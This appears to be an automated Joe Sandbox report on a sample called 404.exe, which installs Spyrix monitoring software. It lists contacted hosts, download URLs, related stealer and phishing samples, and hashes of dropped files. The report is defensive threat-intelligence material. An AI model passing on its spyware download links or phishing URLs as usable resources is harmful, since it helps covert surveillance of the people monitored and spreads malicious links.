                                                                                                                                                                                                        https://api.dropbox.com/1/oauth/access_tokenspkl.exe, spkl.exe, 00000033.00000002.3190059842.0000000000401000.00000040.00000001.01000000.00000015.sdmp, spkl.exe, 00000033.00000003.2960715891.00000000044A0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          unknown
                                                                                                                                                                                                          https://swtb-download.spyrix-sfk.com/download/sfk/sfk_setup.exeWinsta0curl.exe, 0000000A.00000002.1709007892.0000000002E90000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 0000000A.00000002.1709050873.0000000002FD0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            unknown
                                                                                                                                                                                                            http://ocsp.certum.pl0.404.tmp, 0000000D.00000003.1714710707.00000000032E1000.00000004.00001000.00020000.00000000.sdmp, 404.tmp, 0000000D.00000003.3001193671.00000000033D5000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                              unknown
                                                                                                                                                                                                              http://www.jrsoftware.org/ishelp/index.php?topic=setupcmdlineSetupU404.exe, 0000000C.00000000.1710941911.0000000000401000.00000020.00000001.01000000.0000000C.sdmpfalse
                                                                                                                                                                                                                unknown
                                                                                                                                                                                                                • No. of IPs < 25%
                                                                                                                                                                                                                • 25% < No. of IPs < 50%
                                                                                                                                                                                                                • 50% < No. of IPs < 75%
                                                                                                                                                                                                                • 75% < No. of IPs
                                                                                                                                                                                                                IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                                                                167.114.14.168
                                                                                                                                                                                                                swtb-download.spyrix-sfk.comCanada
                                                                                                                                                                                                                16276OVHFRfalse
                                                                                                                                                                                                                239.255.255.250
                                                                                                                                                                                                                unknownReserved
                                                                                                                                                                                                                unknownunknownfalse
                                                                                                                                                                                                                158.69.117.119
                                                                                                                                                                                                                spyrix.netCanada
                                                                                                                                                                                                                16276OVHFRfalse
                                                                                                                                                                                                                167.114.14.170
                                                                                                                                                                                                                cdnbaynet.comCanada
                                                                                                                                                                                                                16276OVHFRfalse
                                                                                                                                                                                                                95.181.182.182
                                                                                                                                                                                                                cl-e0469d03.edgecdn.ruRussian Federation
                                                                                                                                                                                                                200557REGION40RUfalse
                                                                                                                                                                                                                142.250.184.228
                                                                                                                                                                                                                www.google.comUnited States
                                                                                                                                                                                                                15169GOOGLEUSfalse
                                                                                                                                                                                                                23.109.93.100
                                                                                                                                                                                                                filedn.comNetherlands
                                                                                                                                                                                                                7979SERVERS-COMUSfalse
                                                                                                                                                                                                                IP
                                                                                                                                                                                                                192.168.2.7
                                                                                                                                                                                                                127.0.0.1
                                                                                                                                                                                                                Joe Sandbox version:41.0.0 Charoite
                                                                                                                                                                                                                Analysis ID:1523866
                                                                                                                                                                                                                Start date and time:2024-10-02 06:24:22 +02:00
                                                                                                                                                                                                                Joe Sandbox product:CloudBasic
                                                                                                                                                                                                                Overall analysis duration:0h 14m 28s
                                                                                                                                                                                                                Hypervisor based Inspection enabled:false
                                                                                                                                                                                                                Report type:full
                                                                                                                                                                                                                Cookbook file name:default.jbs
                                                                                                                                                                                                                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                                                                                Run name:Run with higher sleep bypass
                                                                                                                                                                                                                Number of analysed new started processes analysed:86
                                                                                                                                                                                                                Number of new started drivers analysed:0
                                                                                                                                                                                                                Number of existing processes analysed:0
                                                                                                                                                                                                                Number of existing drivers analysed:0
                                                                                                                                                                                                                Number of injected processes analysed:0
                                                                                                                                                                                                                Technologies:
                                                                                                                                                                                                                • HCA enabled
                                                                                                                                                                                                                • EGA enabled
                                                                                                                                                                                                                • AMSI enabled
                                                                                                                                                                                                                Analysis Mode:default
                                                                                                                                                                                                                Analysis stop reason:Timeout
                                                                                                                                                                                                                Sample name:404.exe
                                                                                                                                                                                                                Detection:MAL
                                                                                                                                                                                                                Classification:mal52.troj.evad.winEXE@142/1037@15/9
                                                                                                                                                                                                                EGA Information:
                                                                                                                                                                                                                • Successful, ratio: 60%
                                                                                                                                                                                                                HCA Information:Failed
                                                                                                                                                                                                                Cookbook Comments:
                                                                                                                                                                                                                • Found application associated with file extension: .exe
                                                                                                                                                                                                                • Sleeps bigger than 100000000ms are automatically reduced to 1000ms
                                                                                                                                                                                                                • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, backgroundTaskHost.exe, WmiPrvSE.exe, svchost.exe
                                                                                                                                                                                                                • Excluded IPs from analysis (whitelisted): 2.19.126.163, 199.232.210.172, 172.217.18.3, 216.58.206.46, 66.102.1.84, 34.104.35.123, 142.250.185.136, 172.217.16.200, 142.250.185.170, 142.250.186.170, 142.250.186.42, 142.250.181.234, 142.250.185.74, 172.217.18.10, 142.250.186.106, 142.250.184.202, 172.217.16.202, 142.250.184.234, 142.250.185.234, 142.250.186.74, 216.58.206.42, 142.250.185.138, 142.250.185.202, 142.250.185.106
                                                                                                                                                                                                                • Excluded domains from analysis (whitelisted): fs.microsoft.com, clients2.google.com, accounts.google.com, edgedl.me.gvt1.com, content-autofill.googleapis.com, slscr.update.microsoft.com, www.googletagmanager.com, ctldl.windowsupdate.com, clientservices.googleapis.com, time.windows.com, clients.l.google.com, fe3cr.delivery.mp.microsoft.com
                                                                                                                                                                                                                • Execution Graph export aborted for target qrl.exe, PID 4008 because there are no executed function
                                                                                                                                                                                                                • Execution Graph export aborted for target qrl.exe, PID 6208 because there are no executed function
                                                                                                                                                                                                                • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                                                                • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                                                                                                                                                • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                                                                                                • Report size exceeded maximum capacity and may have missing network information.
                                                                                                                                                                                                                • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                                                                                                                                                • Report size getting too big, too many NtCreateFile calls found.
                                                                                                                                                                                                                • Report size getting too big, too many NtCreateKey calls found.
                                                                                                                                                                                                                • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                                                                                                                                                                                                • Report size getting too big, too many NtOpenFile calls found.
                                                                                                                                                                                                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                                                                • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                                                                                                • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                                                                                                                                                                                • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                                                                                • Report size getting too big, too many NtReadFile calls found.
                                                                                                                                                                                                                • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                                                                                                                                                                • Report size getting too big, too many NtSetInformationFile calls found.
                                                                                                                                                                                                                • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                                                                                                                TimeTypeDescription
                                                                                                                                                                                                                01:56:10API Interceptor16x Sleep call for process: 404.exe modified
                                                                                                                                                                                                                InputOutput
                                                                                                                                                                                                                URL: https://dashboard.spyrix.com/login Model: jbxai
                                                                                                                                                                                                                {
                                                                                                                                                                                                                "brand":[],
                                                                                                                                                                                                                "contains_trigger_text":false,
                                                                                                                                                                                                                "trigger_text":"",
                                                                                                                                                                                                                "prominent_button_name":"Login",
                                                                                                                                                                                                                "text_input_field_labels":["Email",
                                                                                                                                                                                                                "Password"],
                                                                                                                                                                                                                "pdf_icon_visible":false,
                                                                                                                                                                                                                "has_visible_captcha":false,
                                                                                                                                                                                                                "has_urgent_text":false,
                                                                                                                                                                                                                "has_visible_qrcode":false}
                                                                                                                                                                                                                URL: https://dashboard.spyrix.com/login Model: jbxai
                                                                                                                                                                                                                {
                                                                                                                                                                                                                "phishing_score":null,
                                                                                                                                                                                                                "brands":"unknown",
                                                                                                                                                                                                                "legit_domain":null,
                                                                                                                                                                                                                "classification":null,
                                                                                                                                                                                                                "reasons":null,
                                                                                                                                                                                                                "brand_matches":[],
                                                                                                                                                                                                                "url_match":false}
                                                                                                                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                167.114.14.168D0WmCTD2qO.batGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                  c5WMpr1cOc.batGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                    sfk.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                      sfk.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                        239.255.255.250D0WmCTD2qO.batGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                          c5WMpr1cOc.batGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                            file.exeGet hashmaliciousCredential FlusherBrowse
                                                                                                                                                                                                                              file.exeGet hashmaliciousCredential FlusherBrowse
                                                                                                                                                                                                                                file.exeGet hashmaliciousCredential FlusherBrowse
                                                                                                                                                                                                                                  http://loglnmicrosoftonl365.Globalfoundries.vitoriorefrigeracao.com.br/excel/active/test@globalfoundries.comGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                    file.exeGet hashmaliciousCredential FlusherBrowse
                                                                                                                                                                                                                                      http://lamourskinclinic.com.auGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                        https://unpaidrefund.top/view/mygovGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                                          158.69.117.119D0WmCTD2qO.batGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                            c5WMpr1cOc.batGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                              167.114.14.170D0WmCTD2qO.batGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                c5WMpr1cOc.batGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                  s14.batGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                    s200.batGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                                      swtb-download.spyrix-sfk.comD0WmCTD2qO.batGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                      • 167.114.14.168
                                                                                                                                                                                                                                                      c5WMpr1cOc.batGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                      • 167.114.14.168
                                                                                                                                                                                                                                                      filedn.comD0WmCTD2qO.batGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                      • 23.109.93.100
                                                                                                                                                                                                                                                      c5WMpr1cOc.batGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                      • 23.109.93.100
                                                                                                                                                                                                                                                      word.exeGet hashmaliciousGuLoaderBrowse
                                                                                                                                                                                                                                                      • 74.120.9.25
                                                                                                                                                                                                                                                      964232908.emlGet hashmaliciousMeshAgentBrowse
                                                                                                                                                                                                                                                      • 23.109.93.100
                                                                                                                                                                                                                                                      http://filedn.comGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                      • 23.109.93.100
                                                                                                                                                                                                                                                      Kh25PMA7u8.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                      • 23.109.93.100
                                                                                                                                                                                                                                                      https://workdrive.zoho.com/file/s8yrwa67a53974b474ef79eb70d1033b872c5Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                                                      • 23.109.93.100
                                                                                                                                                                                                                                                      https://filedn.com/lt87R94Oi7NbcQdmzW2xPrR/link.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                                                      • 23.109.93.100
                                                                                                                                                                                                                                                      https://www.msn.com/en-ca/lifestyle/rf-buying-guides/redirect?rf_click_source=list&rf_client_click_id=000000000&rf_dws_location=&rf_item_id=502238318&rf_list_id=3519472&rf_partner_id=353781453390&rf_source=ebay&url=aHR0cHM6Ly9maWxlZG4uY29tL2x0Q1JsWTNpVGNkN2RjM3UyUm1KdWFTL2xpbmsuaHRtbAGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                                                      • 23.109.93.100
                                                                                                                                                                                                                                                      spyrix.netD0WmCTD2qO.batGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                      • 158.69.117.119
                                                                                                                                                                                                                                                      c5WMpr1cOc.batGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                      • 158.69.117.119
                                                                                                                                                                                                                                                      cl-e0469d03.edgecdn.ruD0WmCTD2qO.batGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                      • 95.181.182.182
                                                                                                                                                                                                                                                      c5WMpr1cOc.batGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                      • 95.181.182.182
                                                                                                                                                                                                                                                      dashboard.spyrix.comD0WmCTD2qO.batGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                      • 158.69.117.119
                                                                                                                                                                                                                                                      c5WMpr1cOc.batGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                      • 158.69.117.119
                                                                                                                                                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                                      OVHFRD0WmCTD2qO.batGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                      • 167.114.14.170
                                                                                                                                                                                                                                                      c5WMpr1cOc.batGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                      • 167.114.14.170
                                                                                                                                                                                                                                                      s14.batGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                      • 167.114.14.170
                                                                                                                                                                                                                                                      s200.batGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                      • 167.114.14.170
                                                                                                                                                                                                                                                      2Efe8RQhvR.vbsGet hashmaliciousPureLog StealerBrowse
                                                                                                                                                                                                                                                      • 91.134.98.142
                                                                                                                                                                                                                                                      http://t1.global.clubavolta.com/r/?id=h53ebcb4b,29506a5f,2988ba3e&e=cDE9UkVEX0dMX0xveWFsdHlMYXVuY2hTb2x1cy1OT0NPTS1BTEwtMDExMDIwMjQtMV9YWCZwMj1kNzEwNWE1Zi00NjE3LWVmMTEtOWY4OS0wMDBkM2EyMmNlYTE&s=MLotNdk8aEH7W1636YhgxIdQC5od3UWYqTZw3tm9630Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                      • 51.195.5.58
                                                                                                                                                                                                                                                      https://www.evernote.com/shard/s683/sh/202c4f3c-3650-93fd-8370-eaca4fc7cbbc/9PDECUYIIdOn7uDMCJfJSDfeqawh-oxMdulb3egg-jZJLZIoB686GWk5jgGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                                                      • 51.68.39.188
                                                                                                                                                                                                                                                      OXrZ6fj4Hq.exeGet hashmaliciousNeshta, Oski Stealer, StormKitty, SugarDump, Vidar, XWormBrowse
                                                                                                                                                                                                                                                      • 51.255.119.242
                                                                                                                                                                                                                                                      moba-24.2-installer_M64ZB-1.exeGet hashmaliciousPureLog StealerBrowse
                                                                                                                                                                                                                                                      • 178.32.197.57
                                                                                                                                                                                                                                                      OVHFRD0WmCTD2qO.batGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                      • 167.114.14.170
                                                                                                                                                                                                                                                      c5WMpr1cOc.batGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                      • 167.114.14.170
                                                                                                                                                                                                                                                      s14.batGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                      • 167.114.14.170
                                                                                                                                                                                                                                                      s200.batGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                      • 167.114.14.170
                                                                                                                                                                                                                                                      2Efe8RQhvR.vbsGet hashmaliciousPureLog StealerBrowse
                                                                                                                                                                                                                                                      • 91.134.98.142
                                                                                                                                                                                                                                                      http://t1.global.clubavolta.com/r/?id=h53ebcb4b,29506a5f,2988ba3e&e=cDE9UkVEX0dMX0xveWFsdHlMYXVuY2hTb2x1cy1OT0NPTS1BTEwtMDExMDIwMjQtMV9YWCZwMj1kNzEwNWE1Zi00NjE3LWVmMTEtOWY4OS0wMDBkM2EyMmNlYTE&s=MLotNdk8aEH7W1636YhgxIdQC5od3UWYqTZw3tm9630Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                      • 51.195.5.58
                                                                                                                                                                                                                                                      https://www.evernote.com/shard/s683/sh/202c4f3c-3650-93fd-8370-eaca4fc7cbbc/9PDECUYIIdOn7uDMCJfJSDfeqawh-oxMdulb3egg-jZJLZIoB686GWk5jgGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                                                      • 51.68.39.188
                                                                                                                                                                                                                                                      OXrZ6fj4Hq.exeGet hashmaliciousNeshta, Oski Stealer, StormKitty, SugarDump, Vidar, XWormBrowse
                                                                                                                                                                                                                                                      • 51.255.119.242
                                                                                                                                                                                                                                                      moba-24.2-installer_M64ZB-1.exeGet hashmaliciousPureLog StealerBrowse
                                                                                                                                                                                                                                                      • 178.32.197.57
                                                                                                                                                                                                                                                      OVHFRD0WmCTD2qO.batGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                      • 167.114.14.170
                                                                                                                                                                                                                                                      c5WMpr1cOc.batGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                      • 167.114.14.170
                                                                                                                                                                                                                                                      s14.batGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                      • 167.114.14.170
                                                                                                                                                                                                                                                      s200.batGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                      • 167.114.14.170
                                                                                                                                                                                                                                                      2Efe8RQhvR.vbsGet hashmaliciousPureLog StealerBrowse
                                                                                                                                                                                                                                                      • 91.134.98.142
                                                                                                                                                                                                                                                      http://t1.global.clubavolta.com/r/?id=h53ebcb4b,29506a5f,2988ba3e&e=cDE9UkVEX0dMX0xveWFsdHlMYXVuY2hTb2x1cy1OT0NPTS1BTEwtMDExMDIwMjQtMV9YWCZwMj1kNzEwNWE1Zi00NjE3LWVmMTEtOWY4OS0wMDBkM2EyMmNlYTE&s=MLotNdk8aEH7W1636YhgxIdQC5od3UWYqTZw3tm9630Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                      • 51.195.5.58
                                                                                                                                                                                                                                                      https://www.evernote.com/shard/s683/sh/202c4f3c-3650-93fd-8370-eaca4fc7cbbc/9PDECUYIIdOn7uDMCJfJSDfeqawh-oxMdulb3egg-jZJLZIoB686GWk5jgGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                                                      • 51.68.39.188
                                                                                                                                                                                                                                                      OXrZ6fj4Hq.exeGet hashmaliciousNeshta, Oski Stealer, StormKitty, SugarDump, Vidar, XWormBrowse
                                                                                                                                                                                                                                                      • 51.255.119.242
                                                                                                                                                                                                                                                      moba-24.2-installer_M64ZB-1.exeGet hashmaliciousPureLog StealerBrowse
                                                                                                                                                                                                                                                      • 178.32.197.57
                                                                                                                                                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                                      28a2c9bd18a11de089ef85a160da29e4D0WmCTD2qO.batGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                      • 13.85.23.86
                                                                                                                                                                                                                                                      • 184.28.90.27
                                                                                                                                                                                                                                                      • 20.114.59.183
                                                                                                                                                                                                                                                      c5WMpr1cOc.batGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                      • 13.85.23.86
                                                                                                                                                                                                                                                      • 184.28.90.27
                                                                                                                                                                                                                                                      • 20.114.59.183
                                                                                                                                                                                                                                                      file.exeGet hashmaliciousCredential FlusherBrowse
                                                                                                                                                                                                                                                      • 13.85.23.86
                                                                                                                                                                                                                                                      • 184.28.90.27
                                                                                                                                                                                                                                                      • 20.114.59.183
                                                                                                                                                                                                                                                      file.exeGet hashmaliciousCredential FlusherBrowse
                                                                                                                                                                                                                                                      • 13.85.23.86
                                                                                                                                                                                                                                                      • 184.28.90.27
                                                                                                                                                                                                                                                      • 20.114.59.183
                                                                                                                                                                                                                                                      file.exeGet hashmaliciousCredential FlusherBrowse
                                                                                                                                                                                                                                                      • 13.85.23.86
                                                                                                                                                                                                                                                      • 184.28.90.27
                                                                                                                                                                                                                                                      • 20.114.59.183
                                                                                                                                                                                                                                                      http://loglnmicrosoftonl365.Globalfoundries.vitoriorefrigeracao.com.br/excel/active/test@globalfoundries.comGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                      • 13.85.23.86
                                                                                                                                                                                                                                                      • 184.28.90.27
                                                                                                                                                                                                                                                      • 20.114.59.183
                                                                                                                                                                                                                                                      file.exeGet hashmaliciousCredential FlusherBrowse
                                                                                                                                                                                                                                                      • 13.85.23.86
                                                                                                                                                                                                                                                      • 184.28.90.27
                                                                                                                                                                                                                                                      • 20.114.59.183
                                                                                                                                                                                                                                                      https://unpaidrefund.top/view/mygovGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                                                      • 13.85.23.86
                                                                                                                                                                                                                                                      • 184.28.90.27
                                                                                                                                                                                                                                                      • 20.114.59.183
                                                                                                                                                                                                                                                      file.exeGet hashmaliciousCredential FlusherBrowse
                                                                                                                                                                                                                                                      • 13.85.23.86
                                                                                                                                                                                                                                                      • 184.28.90.27
                                                                                                                                                                                                                                                      • 20.114.59.183
                                                                                                                                                                                                                                                      74954a0c86284d0d6e1c4efefe92b521D0WmCTD2qO.batGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                      • 167.114.14.170
                                                                                                                                                                                                                                                      • 167.114.14.168
                                                                                                                                                                                                                                                      c5WMpr1cOc.batGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                      • 167.114.14.170
                                                                                                                                                                                                                                                      • 167.114.14.168
                                                                                                                                                                                                                                                      s14.batGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                      • 167.114.14.170
                                                                                                                                                                                                                                                      • 167.114.14.168
                                                                                                                                                                                                                                                      s200.batGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                      • 167.114.14.170
                                                                                                                                                                                                                                                      • 167.114.14.168
                                                                                                                                                                                                                                                      KYwOaWhyl6.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                                                                                                                                                                                      • 167.114.14.170
                                                                                                                                                                                                                                                      • 167.114.14.168
                                                                                                                                                                                                                                                      HdXeCzyZD9.exeGet hashmaliciousLummaC, DCRat, LummaC Stealer, PureLog Stealer, zgRATBrowse
                                                                                                                                                                                                                                                      • 167.114.14.170
                                                                                                                                                                                                                                                      • 167.114.14.168
                                                                                                                                                                                                                                                      NCTSgL4t0B.exeGet hashmaliciousLummaC, DCRat, LummaC Stealer, PureLog Stealer, zgRATBrowse
                                                                                                                                                                                                                                                      • 167.114.14.170
                                                                                                                                                                                                                                                      • 167.114.14.168
                                                                                                                                                                                                                                                      TJWbSGBK0I.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                                                                                                                                                                                      • 167.114.14.170
                                                                                                                                                                                                                                                      • 167.114.14.168
                                                                                                                                                                                                                                                      4tXm5yPtiy.exeGet hashmaliciousLummaC, DCRat, LummaC Stealer, PureLog Stealer, zgRATBrowse
                                                                                                                                                                                                                                                      • 167.114.14.170
                                                                                                                                                                                                                                                      • 167.114.14.168
                                                                                                                                                                                                                                                      3b5074b1b5d032e5620f69f9f700ff0eScan_doc_09_16_24_1203.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                                                                                                      • 23.109.93.100
                                                                                                                                                                                                                                                      E_BILL0041272508.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                                                                                                      • 23.109.93.100
                                                                                                                                                                                                                                                      Scan_doc_09_16_24_1120.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                                                                                                      • 23.109.93.100
                                                                                                                                                                                                                                                      E_BILL9926378035.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                                                                                                      • 23.109.93.100
                                                                                                                                                                                                                                                      D0WmCTD2qO.batGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                      • 23.109.93.100
                                                                                                                                                                                                                                                      c5WMpr1cOc.batGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                      • 23.109.93.100
                                                                                                                                                                                                                                                      Scan_doc_09_16_24_1203.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                                                                                                      • 23.109.93.100
                                                                                                                                                                                                                                                      E_BILL0041272508.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                                                                                                      • 23.109.93.100
                                                                                                                                                                                                                                                      jD1RqkyUNm.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                                                                                                                                                                                      • 23.109.93.100
                                                                                                                                                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                                      C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\WebBrowser.dll (copy)D0WmCTD2qO.batGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                        c5WMpr1cOc.batGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):457728
                                                                                                                                                                                                                                                          Entropy (8bit):6.59955980299879
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:12288:oYP3U+DowYPZOobyfwOgM2evuRTQ8r5e:3knwGZO4ZBevgTQ
                                                                                                                                                                                                                                                          MD5:5E952525D9379E001F1714DE9E87B50D
                                                                                                                                                                                                                                                          SHA1:45A1F15E62D3BEBF80BFDE69B992448DA09369FA
                                                                                                                                                                                                                                                          SHA-256:81DE9F4EE9164358163C7F2200522E5C518D649ED6868CC6F27DB2B831F42DA4
                                                                                                                                                                                                                                                          SHA-512:FCCEFD5CEFA59AAE1CCF1DF61907720BFB753AA1A6094DCB9225BA0110172103980C77708B9BB36F9D329B890ECC3F279AEE325A780308E9AC127EDC99CF8D0D
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                          Joe Sandbox View:
                                                                                                                                                                                                                                                          • Filename: D0WmCTD2qO.bat, Detection: malicious, Browse
                                                                                                                                                                                                                                                          • Filename: c5WMpr1cOc.bat, Detection: malicious, Browse
                                                                                                                                                                                                                                                          Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*..................................... ....@..............................................................................(...0...L.......................e......................................................\............................text............................... ..`.itext.............................. ..`.data...T.... ......................@....bss.....5...@...........................idata...(.......*..................@....edata...............H..............@..@.reloc...e.......f...J..............@..B.rsrc....L...0...L..................@..@....................................@..@........................................................................................................................................
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):5329
                                                                                                                                                                                                                                                          Entropy (8bit):5.379707763753434
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:96:nsPCuKyBy4PRWZSx84GmqUIa+zHBZclQmmUc6EYQZCh1t64R8vVIa2akG2T:xuVr5WExXG6UvUmUbrQIvtO9INakGc
                                                                                                                                                                                                                                                          MD5:CD2AC50D3746B1A9663C4D2BF7EA4D55
                                                                                                                                                                                                                                                          SHA1:909F5CFEB390B67FEFC6CD1786760FEBDBB2B875
                                                                                                                                                                                                                                                          SHA-256:F9C158AEFD53582E68F7417E6326620AE4FDE859EE6D02B263EEA838A2C6F136
                                                                                                                                                                                                                                                          SHA-512:E47073C412A92325DA84516358B43CC855B67FA6E44D092005143B35EA021B72BF8607B619F179706E3B66332A24EEB3910E1AF69076D29527C60DFF9EFF8A5F
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
